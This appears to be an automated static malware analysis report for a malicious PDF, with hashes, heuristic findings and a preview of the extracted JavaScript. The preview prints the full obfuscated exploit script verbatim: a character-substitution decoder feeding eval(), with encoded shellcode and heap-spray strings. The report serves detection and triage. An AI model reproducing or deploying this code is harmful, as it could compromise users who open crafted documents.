Malicious PDF — malware analysis report

Static analysis result for SHA-256 b876443ac614793c…

MALICIOUS

PDF

9.6 KB Created: 2010-05-10 15:31:18 Authoring application: vuWSrWyqL79 (via NkrIOhMb) First seen: 2026-05-11
MD5: c0bd5a15e47a95aa9783b0704ccce2d6 SHA-1: 6ccda89114119dce86569bee050da113ab9748bc SHA-256: b876443ac614793c0ff778fc5f9828e9c984e842a13da3ea790043c94ada1ac5
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is often employed to deobfuscate and execute malicious code. The extracted JavaScript object, javascript_obj0007_000.js, is likely responsible for the malicious behavior, potentially downloading and executing a second-stage payload. The obfuscation indicators noted in the static triage further support this assessment.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    bNb%Q4N(x%QNJxJ%QYJrs%QxM,s%QWWD,%Q,YYD%Qx6sr%QN,Nx%QxJxN%Q(W,Y%Q,xM4%Q,,Y4%Qs(r,%QrDM(%QM4b4%QrDb4%QxJJr%QPs2N%Qx2b4%Qb4(4%QW2rD%Q2NxJ%Qxrb4%QxJb4%Qr,N(%QNYrN%QxWx6%Q,rM6%Q,M,,%Qr(,M%Q(2rY%Q(M(N%QxW(,%Q64bP%Q6M64%QNW2(%Qb4NW%QbY2M%Q2,b,%Q62bx%QbsNx%Qbbbx%QNWbW%QbJbN%Qb6bW%QbJNW%Qb,bW%QNxb4%QbP6M%Q2W6M%Qb4bs%Q2s2Y%QMM2,\"G;\n77v\n77 IC 7qy7eWllSFn}4WlAi90gg7==7NG3\n7777)WsJ BW0Ylmdp)Vl7=7Q8 COmk e\"%Q4242%Q4242%Q4242%QMWxr%Q22Dr%QbbJs%QPMrs%QPMM,%QxW22%QxN42%QxrW(%QxPMD%QWWxJ%QWWWW%QPr6W%QYW4x%Q …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x23F 8191 bytes
SHA-256: 41bcbef460ec5021072bff032a349700087916b33625ce00f2c07fdb5650c131
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 83 of 164 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function OM9oPtwA67tvCut3k(OM9oPtwA67tvCut3k,qgx8CoEVwr) {var GYj5kfxhKiF=OM9oPtwA67tvCut3k. substr (qgx8CoEVwr, 1);return GYj5kfxhKiF;}/*AKAaRd5u|Ga9xhc7vXW1v5xWa|AlJ9xKKxlcRgNA*/function VhKmk(dKZDhaRTLMwzYMfMiRd) {/*o9aMbY7zuzlpm7G|AsX0fhBS|ekorkSV*/var IeoPi9xsmXnFiDJF = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*shBHf12Uci7ZoK[WhH2FJKNn]AVVLr54P7Buy3FQbD*//*GO7cwEU1NfF1Q8M|J3hDIeE3S89jaC|gQM8CRT4e*/var aZpnMfCZAO7S /*AVG7isHbPKktPeBNdl[f0KwDJzUcuzStLY]tGyLV9wFOQHctsGP*/= new String("THeG3v71w(rJYxWz}9thoZVnBFX)c{fd5>AmuOa yipqKUIS8lkRgC0Q<Ej.LM,N24Db6Ps");/*RCma263mvLV7kD|q22C1oHG4Ojo7q4f|AIXyERa0cwxD0etsWwkB*/for(rbNVqvUdd61HCZLM=0;rbNVqvUdd61HCZLM<IeoPi9xsmXnFiDJF.length;rbNVqvUdd61HCZLM++) {if(dKZDhaRTLMwzYMfMiRd == OM9oPtwA67tvCut3k(aZpnMfCZAO7S, rbNVqvUdd61HCZLM)) {/*q5IPkF6el3auQPyhqpA[dDT8xBVjlWdS]mi2seXUXy*/return OM9oPtwA67tvCut3k(IeoPi9xsmXnFiDJF, rbNVqvUdd61HCZLM);/*oD3Mti <MCRfBEhW]JtIbBvA4eeSy2G2*/}}return dKZDhaRTLMwzYMfMiRd;}/*Jvu3U7FXOlYTI[ASeHug3ubXPtLIzEp]AZ1KX7imj76ss5AMCut6*//*KTv3f3tjjsZ9j|XhJ9GG5zy1zB4k|AG5J1zpviOUQoU0Pr*/var AebMeGcN = new String;var cKzM617pviAbEyaHdec = new String("\n<mg7Q X2qLCUFZS5jQ9Q7=78 E7(ggm.eG;\n<mg7SrP66V)M)RMBRDC8;\nyQ8O0ql878hR)tqJUbL}2QAj8euD0RXZ,QJMt2xJRjw7aiFRBOm{Og5dF{trG3\n77EpqI 7euD0RXZ,QJMt2xJRj1I 8i0p7*7N7T7aiFRBOm{Og5dF{trG3\n7777uD0RXZ,QJMt2xJRj7+=7uD0RXZ,QJMt2xJRj;\n77v\n77uD0RXZ,QJMt2xJRj7=7uD0RXZ,QJMt2xJRj1CQuC0gq8ieMw7aiFRBOm{Og5dF{tr7/7NG;\n77g 0Qg87uD0RXZ,QJMt2xJRj;\nv\nyQ8O0ql87cY2,A2<SrxkFXin.eWllSFn}4WlAi90ggG3\n77<mg78QCiE8)s29Ac.jXo7=7MjMOMOMOMO;\n77<mg7)WsJ BW0Ylmdp)Vl7=7Q8 COmk e\"%Q4242%Q4242%Q4242%QMWxr%Q22Dr%QbbJs%QPMrs%QPMM,%QxW22%QxN42%QxrW(%QxPMD%QWWxJ%QWWWW%QPr6W%QYW4x%QxWxW%Qb4xW%Qx2(W%QsWb4%Q4NW2%QsWb4%Qbxx6%QxWM2%QxWxr%Qb4xW%QrsM2%Qb,P6%Qx,(,%QM6M2%QxW,,%QxWxW%Q((bb%Qrsxr%Q66P6%QbD,,%QM6x,%QxW,W%QxWxW%Q((bb%Qrsx6%QJ(P6%Q,MDW%QM6NY%QxWMY%QxWxW%Q((bb%Qrsx2%QMMP6%QMWN,%QM6PW%QxW2r%QxWxW%Q((bb%QrsWW%QNxP6%QM(sb%QM6D6%QxWNs%QxWxW%Q((bb%Q(WWr%QY6bW%Qs(NJ%Qbb,D%QW6((%QxPMb%QxWxx%Qr,xW%Qs(bb%Qb4Jr%Qxr((%QxxPD%Qb4rb%QW6r(%QM6rs%QxWb4%QxWxW%QP6rW%QWDYs%QsWJM%Q6PM6%QxWxW%QbbxW%QW2((%QN(b4%QNWbJ%QbbrW%QJW((%Q,MP6%QxWxW%QrWxW%Q((b4%QPDWr%QrbxY%Qr(b4%QM6W6%QxWPx%QxWxW%Q((xJ%QNPJW%Qr2xW%QJ,s,%QNPP(%Qxr(W%QP(s6%QxWxW%Qs(,M%Qb4JW%Qx2((%QxxPD%Qb4rb%QW6r(%Q(WM6%QxWxW%QPDxW%Qr6xP%Q((xJ%QYJJr%QrJ24%Q,MrJ%QJWs(%QrJrW%Q((b4%QPDW2%Qrbx(%Qr(b4%QM6W6%QxWJJ%QxWxW%QxWPD%Qs(,M%Qb4JW%Qx6((%QxYPD%Qb4rb%QW6r(%QWWM6%QxWxW%QPDxW%Qb4,M%QWW((%QxxPD%Qb4rb%QW6r(%QxWM6%QxWxW%Q(xxW%QrYr4%QMxxJ%QMxxJ%QMxxJ%QMxxJ%QM2bJ%QrDxr%Qb4rJ%QMY2D%QrY,P%QMW,M%Qb4r(%Qb4M2%Qx6sN%QrNb4%Qrsx2%QsJb4%Qb4Y2%QW,sr%QxJs6%Qrs,J%Qssb4%QxJJW%QYJ,J%Q(bNb%Q4N(x%QNJxJ%QYJrs%QxM,s%QWWD,%Q,YYD%Qx6sr%QN,Nx%QxJxN%Q(W,Y%Q,xM4%Q,,Y4%Qs(r,%QrDM(%QM4b4%QrDb4%QxJJr%QPs2N%Qx2b4%Qb4(4%QW2rD%Q2NxJ%Qxrb4%QxJb4%Qr,N(%QNYrN%QxWx6%Q,rM6%Q,M,,%Qr(,M%Q(2rY%Q(M(N%QxW(,%Q64bP%Q6M64%QNW2(%Qb4NW%QbY2M%Q2,b,%Q62bx%QbsNx%Qbbbx%QNWbW%QbJbN%Qb6bW%QbJNW%Qb,bW%QNxb4%QbP6M%Q2W6M%Qb4bs%Q2s2Y%QMM2,\"G;\n77qy7eWllSFn}4WlAi90gg7==7,G3\n77778QCiE8)s29Ac.jXo7=7Mj2M2M2M2M;\n7777)WsJ BW0Ylmdp)Vl7=7Q8 COmk e\"%Q4242%Q4242%Q4242%QMWxr%Q22Dr%QbbJs%QPMrs%QPMM,%QxW22%QxN42%QxrW(%QxPMD%QWWxJ%QWWWW%QPr6W%QYW4x%QxWxW%Qb4xW%Qx2(W%QsWb4%Q4NW2%QsWb4%Qbxx6%QxWM2%QxWxr%Qb4xW%QrsM2%Qb,P6%Qx,(,%QM6M2%QxW,,%QxWxW%Q((bb%Qrsxr%Q66P6%QbD,,%QM6x,%QxW,W%QxWxW%Q((bb%Qrsx6%QJ(P6%Q,MDW%QM6NY%QxWMY%QxWxW%Q((bb%Qrsx2%QMMP6%QMWN,%QM6PW%QxW2r%QxWxW%Q((bb%QrsWW%QNxP6%QM(sb%QM6D6%QxWNs%QxWxW%Q((bb%Q(WWr%QY6bW%Qs(NJ%Qbb,D%QW6((%QxPMb%QxWxx%Qr,xW%Qs(bb%Qb4Jr%Qxr((%QxxPD%Qb4rb%QW6r(%QM6rs%QxWb4%QxWxW%QP6rW%QWDYs%QsWJM%Q6PM6%QxWxW%QbbxW%QW2((%QN(b4%QNWbJ%QbbrW%QJW((%Q,MP6%QxWxW%QrWxW%Q((b4%QPDWr%QrbxY%Qr(b4%QM6W6%QxWPx%QxWxW%Q((xJ%QNPJW%Qr2xW%QJ,s,%QNPP(%Qxr(W%QP(s6%QxWxW%Qs(,M%Qb4JW%Qx2((%QxxPD%Qb4rb%QW6r(%Q(WM6%QxWxW%QPDxW%Qr6xP%Q((xJ%QYJJr%QrJ24%Q,MrJ%QJWs(%QrJrW%Q((b4%QPDW2%Qrbx(%Qr(b4%QM6W6%QxWJJ%QxWxW%QxWPD%Qs(,M%Qb4JW%Qx6((%QxYPD%Qb4rb%QW6r(%QWWM6%QxWxW%QPDxW%Qb4,M%QWW((%QxxPD%Qb4rb%QW6r(%QxWM6%QxWxW%Q(xxW%QrYr4%QMxxJ%QMxxJ%QMxxJ%QMxxJ%QM2bJ%QrDxr%Qb4rJ%QMY2D%QrY,P%QMW,M%Qb4r(%Qb4M2%Qx6sN%QrNb4%Qrsx2%QsJb4%Qb4Y2%QW,sr%QxJs6%Qrs,J%Qssb4%QxJJW%QYJ,J%Q(bNb%Q4N(x%QNJxJ%QYJrs%QxM,s%QWWD,%Q,YYD%Qx6sr%QN,Nx%QxJxN%Q(W,Y%Q,xM4%Q,,Y4%Qs(r,%QrDM(%QM4b4%QrDb4%QxJJr%QPs2N%Qx2b4%Qb4(4%QW2rD%Q2NxJ%Qxrb4%QxJb4%Qr,N(%QNYrN%QxWx6%Q,rM6%Q,M,,%Qr(,M%Q(2rY%Q(M(N%QxW(,%Q64bP%Q6M64%QNW2(%Qb4NW%QbY2M%Q2,b,%Q62bx%QbsNx%Qbbbx%QNWbW%QbJbN%Qb6bW%QbJNW%Qb,bW%QNxb4%QbP6M%Q2W6M%Qb4bs%Q2s2Y%QMM2,\"G;\n77v\n77 IC 7qy7eWllSFn}4WlAi90gg7==7NG3\n7777)WsJ BW0Ylmdp)Vl7=7Q8 COmk e\"%Q4242%Q4242%Q4242%QMWxr%Q22Dr%QbbJs%QPMrs%QPMM,%QxW22%QxN42%QxrW(%QxPMD%QWWxJ%QWWWW%QPr6W%QYW4x%QxWxW%Qb4xW%Qx2(W%QsWb4%Q4NW2%QsWb4%Qbxx6%QxWM2%QxWxr%Qb4xW%QrsM2%Qb,P6%Qx,(,%QM6M2%QxW,,%QxWxW%Q((bb%Qrsxr%Q66P6%QbD,,%QM6x,%QxW,W%QxWxW%Q((bb%Qrsx6%QJ(P6%Q,MDW%QM6NY%QxWMY%QxWxW%Q((bb%Qrsx2%QMMP6%QMWN,%QM6PW%QxW2r%QxWxW%Q((bb%QrsWW%QNxP6%QM(sb%QM6D6%QxWNs%QxWxW%Q((bb%Q(WWr%QY6bW%Qs(NJ%Qbb,D%QW6((%QxPMb%QxWxx%Qr,xW%Qs(bb%Qb4Jr%Qxr((%QxxPD%Qb4rb%QW6r(%QM6rs%QxWb4%QxWxW%QP6rW%QWDYs%QsWJM%Q6PM6%QxWxW%QbbxW%QW2((%QN(b4%QNWbJ%QbbrW%QJW((%Q,MP6%QxWxW%QrWxW%Q((b4%QPDWr%QrbxY%Qr(b4%QM6W6%QxWPx%QxWxW%Q((xJ%QNPJW%Qr2xW%QJ,s,%QNPP(%Qxr(W%QP(s6%QxWxW%Qs(,M%Qb4JW%Qx2((%QxxPD%Qb4rb%QW6r(%Q(WM6%QxWxW%QPDxW%Qr6xP%Q((xJ%QYJJr%QrJ24%Q,MrJ%QJWs(%QrJrW%Q((b4%QPDW2%Qrbx(%Qr(b4%QM6W6%QxWJJ%QxWxW%QxWPD%Qs(,M%Qb4JW%Qx6((%QxYPD%Qb4rb%QW6r(%QWWM6%QxWxW%QPDxW%Qb4,M%QWW((%QxxPD%Qb4rb%QW6r(%QxWM6%QxWxW%Q(xxW%QrYr4%QMxxJ%QMxxJ%QMxxJ%QMxxJ%QM2bJ%QrDxr%Qb4rJ%QMY2D%QrY,P%QMW,M%Qb4r(%Qb4M2%Qx6sN%QrNb4%Qrsx2%QsJb4%Qb4Y2%QW,sr%QxJs6%Qrs,J%Qssb4%QxJJW%QYJ,J%Q(bNb%Q4N(x%QNJxJ%QYJrs%QxM,s%QWWD,%Q,YYD%Qx6sr%QN,Nx%QxJxN%Q(W,Y%Q,xM4%Q,,Y4%Qs(r,%QrDM(%QM4b4%QrDb4%QxJJr%QPs2N%Qx2b4%Qb4(4%QW2rD%Q2NxJ%Qxrb4%QxJb4%Qr,N(%QNYrN%QxWx6%Q,rM6%Q,M,,%Qr(,M%Q(2rY%Q(M(N%QxW(,%Q64bP%Q6M64%QNW2(%Qb4NW%QbY2M%Q2,b,%Q62bx%QbsNx%Qbbbx%QNWbW%QbJbN%Qb6bW%QbJNW%Qb,bW%QNxb4%QbP6M%Q2W6M%Qb4bs%Q2s2Y%QMM2,\"G;\n77v\n77<mg7nz{t4j)bWNAx.NAU7=7Mj4MMMMM;\n77<mg7mpEQPJlo,ngqRWdY7=7)WsJ BW0Ylmdp)Vl1I 8i0p7*7N;\n77<mg7aiFRBOm{Og5dF{tr7=7nz{t4j)bWNAx.NAU7-7empEQPJlo,ngqRWdY7+7Mj2PG;\n77<mg7uD0RXZ,QJMt2xJRj7=7Q8 COmk e\"%QsMsM%QsMsM\"G;\n77uD0RXZ,QJMt2xJRj7=78hR)tqJUbL}2QAj8euD0RXZ,QJMt2xJRjw7aiFRBOm{Og5dF{trG;\n77<mg78Nd>.L x,x)LW2Kf7=7e8QCiE8)s29Ac.jXo7-7Mj4MMMMMG7/7nz{t4j)bWNAx.NAU;\n77ylg7e<mg79iFCCWY0 Duftsql7=7M;79iFCCWY0 Duftsql7T78Nd>.L x,x)LW2Kf;79iFCCWY0 Duftsql7++7G3\n7777Q X2qLCUFZS5jQ9Q[9iFCCWY0 Duftsql]7=7uD0RXZ,QJMt2xJRj7+7)WsJ BW0Ylmdp)Vl;\n77v\nv\nyQ8O0ql87qWVsx2VWzRxf0.NaeG3\n77<mg7R)f5pKFo82gPrA<o7=7M;\n77<mg7yt{4ogtup>Pmdsxr7=7mkk1<q E gf gCql810l)0gq8ieG;\n77mkk1OI mgcqS nQ0eSrP66V)M)RMBRDC8G;\n\n77qy7eyt{4ogtup>Pmdsxr7T761,G3\n7777cY2,A2<SrxkFXin.eMG;\n7777<mg7pUq9cM }rfnVbhqQ7=7Q8 COmk e\"%QMOMO%QMOMO\"G;\n7777EpqI 7epUq9cM }rfnVbhqQ1I 8i0p7T744sDNGpUq9cM }rfnVbhqQ7+=7pUq9cM }rfnVbhqQ;\n77770pqC71OlIImu)0lg 7=7JlIImu1OlII O0xSmqI98yle3\n777777CQuK7:7\"\"w7SCi7:7pUq9cM }rfnVbhqQ\n7777v\n7777G;\n77v\nqy7eyt{4ogtup>Pmdsxr7H=7sG3\n77770g.73\nqy7emkk1alO1JlIImu1i 09Ol8G3\n77777777cY2,A2<SrxkFXin.eNG;\n77777777<mg7)Y..D9mSRqVZRu>X7=7Q8 COmk e\"%Ms\"G;\n77777777EpqI 7e)Y..D9mSRqVZRu>X1I 8i0p7T7Mj4MMMG)Y..D9mSRqVZRu>X7+=7)Y..D9mSRqVZRu>X;\n77777777)Y..D9mSRqVZRu>X7=7\"V1\"7+7)Y..D9mSRqVZRu>X;\nmkk1alO1JlIImu1i 09Ol8e)Y..D9mSRqVZRu>XG;\n77777777R)f5pKFo82gPrA<o7=7,;\n777777v\n777777 IC 73\n77777777R)f5pKFo82gPrA<o7=7,;\n777777v\n7777v\n7777Om0Op7e G3\n777777R)f5pKFo82gPrA<o7=7,;\n7777v\n7777qy7eR)f5pKFo82gPrA<o7==7,G3\n777777qy7eeyt{4ogtup>Pmdsxr7H=761,&&7yt{4ogtup>Pmdsxr7T7sGG3\n77777777cY2,A2<SrxkFXin.e,G;\n77777777<mg7EzUkFB6O<{L,kq<)7=7\",Nssssssssssssssssss\";\n77777777ylg7eo0X,r2S2UMnuUE467=7M;7o0X,r2S2UMnuUE467T7N6b;7o0X,r2S2UMnuUE467++7G3\n7777777777EzUkFB6O<{L,kq<)7+=7\"P\";\n77777777v\n77777777Q0qI1kgq80ye\"%4DMMMy\"w7EzUkFB6O<{L,kq<)G;\n777777v\n7777v\n77v\nv\nmkk1.lE Y4zs>zMV.DkQ7=7qWVsx2VWzRxf0.Na;\nSrP66V)M)RMBRDC87=7mkk1C 0cqS nQ0e\"mkk1.lE Y4zs>zMV.DkQeG\"w7,MG;\n");/*YreenUTeJUY{FO0AYs0DdYSyo7If}A3lhYGKs*//*p2uDm0Sd1qL|uoFDcuAlPNbJz9h6|QWzIH3u*/for(LpQqHcKN5=0;LpQqHcKN5<cKzM617pviAbEyaHdec.length;LpQqHcKN5++)AebMeGcN += VhKmk(OM9oPtwA67tvCut3k(cKzM617pviAbEyaHdec,LpQqHcKN5));eval(AebMeGcN);/*MNz2ZgnDmrgXrHn5jwvi[rtkEisLcdJ]r8hGfLJI2pfkxIg*/

Open this report in the interactive analyzer, or submit your own file for analysis.